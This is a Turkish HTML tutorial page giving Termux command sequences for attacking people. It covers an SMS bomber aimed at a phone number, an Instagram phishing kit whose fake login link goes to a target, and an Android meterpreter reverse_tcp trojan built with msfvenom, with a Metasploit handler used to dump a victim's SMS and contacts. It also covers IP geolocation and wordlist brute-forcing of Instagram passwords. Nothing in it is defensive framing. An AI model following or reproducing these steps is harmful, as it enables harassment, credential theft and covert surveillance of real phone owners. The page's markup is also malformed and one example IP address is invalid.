<! DOCTYPE html>
<html meta charset = "UTF-8">

				<head>
								
				</head>
				<body bgcolor = "9c9c9c">
								<h1 align = "center">
												Koker Eğitim Setleri 
								</h1>
								<table bgcolor = "6e7b8b"border = "10" height = "200" width = "1000">
								<tr>
												<td>
																<font size = "3">Termux Sms Bomber Nasil Yapilir ? :<ul>
																				<li>
																								Play Storeden Termux Adlı Uygulamayi indirin Ve sira sira Yazdigim Kodlari girin
																				</li>
																				<li>
																								apt update
																				</li>
																				<li>
																								apt upgrade
																				</li>
																				<li>
																								pkg install python
																				</li>
																				<li>
																								pkg install git
																				</li>
																				<li>
																								git clone https://github.com/LimerBoy/Impulse
																				</li>
																				<li>
																								cd Impulse
																				</li>
																				<li>
																								pip3 install -r requirements.txt
																				</li>
																				
																				<li>
																								python3 impulse.py
																				</li>
																				<li>
																								Sonrasinda Şöyle çalıştırın aracımızı: python3 impulse.py --method SMS --time 20 --threads 15 --target +90(hedef)
																				</li>
																				<li>
																								Örneğin:python3 impulse.py --method SMS --time 20 --threads 15 --target +901234567890
																				</li>
																</ul></font>
												</td>
								</tr>
								</table bgcolor = "6e7b8b" border = "10" height = "200" width = "1000">
								
													<table bgcolor = "6e7b8b"border = "10" height = "200" width = "1000">
								<tr>
												<td>
																<font size = "3">Termux Phishing Oltalama Nasıl Yapılir ? :<ul>
																				<li>
																								Play Storeden Termux Adlı Uygulamayi indirin Ve sira sira Yazdigim Kodlari girin
																				</li>
																				<li>
																								apt update
																				</li>
																				<li>
																								apt upgrade
																				</li>
																				<li>
																								pkg install git
																				</li>
																				<li>
																								git clone https://github.com/yamanefkar/Turk-Sploit
																				</li>
																				<li>
																								cd Turk-Sploit
																				</li>
																				<li>
																								bash requirements.sh
																				</li>
																				<li>
																								bash tst.sh
																				</li>
																				
																				<li>
																								Sonra burdan istedığiniz sosyal medyayi girin örneğin 1 instangram burdan 1 i girerek sahte giris yapiypruz portada 3333 girin
																				</li>
																				<li>
																								sonra burdan io ile biten linki hedefe atin
																				</li>
																				<li>
																								son olarakda dinlemek icin basa donup 00 basarak kod yerine insta01 yazip dinlemeye alin linki
																				</li>
																				
																</ul></font>
												</td>
								</tr>
								</table bgcolor = "6e7b8b" border = "10" height = "200" width = "1000">
								
																			<table bgcolor = "6e7b8b"border = "10" height = "200" width = "1000">
								<tr>
												<td>
																<font size = "3">Termux Trojan Oluşturma Ve Kullanma :<ul>
																				<li>
																								Play Storeden Termux Adlı Uygulamayi indirin Ve sira sira Yazdigim Kodlari girin
																				</li>
																				<li>
																								apt update
																				</li>
																				<li>
																								apt upgrade
																				</li>
																				<li>
																								pkg install wget
																				</li>
																				<li>
																								pkg install curl
																				</li>
																				<li>
																								wget https://github.com/Hax4us/TermuxBlack/raw/master/install.sh
																				</li>
																				<li>
																								bash install.sh -i
																				</li>
																				<li>
																							 wget http://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
																				</li>
																				
																				<li>
																								
																				</li>
																				<li>
																								chmod +x metasploit.sh
																				</li>
																				<li>
																								./metasploit.sh
																				</li>
																				<li>
																								termuxa depolama izni verin
																				</li>
																				<li>
																								msfvenom -p android/meterpreter/reverse_tcp LHOST=(local ip) LPORT=3333 -o /sdcard/trojan.apk
																				</li>
																				<li>
																								localhost ip bulmak icin termuxa ifconfig yazin unspec diye bisey yaziyo en altta onun ustundeki inet yazan 192.168 diye devam eden seydir
																				</li>
																				<li>
																								örneğin:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.37 LPORT=3333 -o /sdcard/trojan.apk
																				</li>
																				<li>
																								cd metasploit-framework 
																				</li>
																				<li>
																								./msfconsole
																				</li>
																				<li>
																								use exploit/multi/handler																</li>
																								<li>
																												set payload android/meterpreter/reverse_tcp
																								</li>
																								<li>set lhost = (local ip) örneğin set lhost = 192.168.1.37</li>
																								<li>
																												set lport = 3333
																								</li>
																								<exploit>
																												Şuan Trojan dinlemede help yazarak yapabileceklerimize bakabiliriz örneğin dump_sms yaparak gelen smsleri anlik alabiliriz dump_contacts diyerekde rehber alabiliriz
																								</exploit>
																				
																</ul></font>
												</td>
								</tr>
								</table bgcolor = "6e7b8b" border = "10" height = "200" width = "1000">										
								
										<table bgcolor = "6e7b8b"border = "10" height = "200" width = "1000">
								<tr>
												<td>
																<font size = "3">Termux İpden Yaklaşık Konum Vb Bulma Nasıl Yapılır :<ul>
																				
																								
                    <li>
																								Play Storeden Termux Adlı Uygulamayi indirin Ve sira sira Yazdigim Kodlari girin
																				</li>
																				<li>
																								apt update
																				</li>
																				<li>
																								apt upgrade
																				</li>
																				<li>
																								pkg install git
																				</li>
																				<li>
																								git clone https://github.com/rajkumardusad/IP-Tracer.git
																				</li>
																				<li>
																								cd IP-Tracer
																				</li>
																				<li>
																								chmod +x install
																				</li>
																				
																				<li>
																								sh install
																				</li>
																				<li>
																								trace -t (taranacak ip)
																				</li>
																				<li>
																								örneğin trace -t 123.13.3.4.4 
																				</li>
																				<li>
location yazan yer yaklasik konumdur
																				</li>
																				
																</ul></font>
												</td>
								</tr>
								</table bgcolor = "6e7b8b" border = "10" height = "200" width = "1000">									
													
													
																	
										<table bgcolor = "6e7b8b"border = "10" height = "200" width = "1000">
								<tr>
												<td>
																<font size = "3">Termux Brute Force Nasıl Yapılir ? :<ul>
																				<li>
																								Önce Şurdan Wordlistimizi indirelim <a href="https://github.com/utkusen/turkce-wordlist/raw/master/wordlist.txt">İndir</a>
																							bu dosyayi indirin
																				</li>
																				<li>
																								Play Storeden Termux Adlı Uygulamayi indirin Ve sira sira Yazdigim Kodlari girin
																				</li>
																				<li>
																								apt update
																				</li>
																				<li>
																								apt upgrade
																				</li>
																				<li>
																								pkg install git
																				</li>
																				<li>
																								cd Turk-Sploit
																				</li>
																				<li>
																								bash gereksinimleri.sh
																				</li>
																				<li>
																								bash tst.sh
																				</li>
																				
																				<li>
																								Sonra istediginiz sosyal medyayi girin örneğin instangram : 1
																				</li>
																				<li>
																								sonra burdan 2 ye basarak brute forceyi acin
																				</li>
																				<li>
																								sonrasinda word listi indirdiginiz dizini secin
																				</li>
																				<li>
																								termuxa depolama izni verin
																				</li>
																				<li>
																								örneğin /sdcard/Download/wordlist.txt tamamdir
																				</li>
																				
																</ul></font>
												</td>
								</tr>
								</table bgcolor = "6e7b8b" border = "10" height = "200" width = "1000">			
				</body>
				
				
</html>
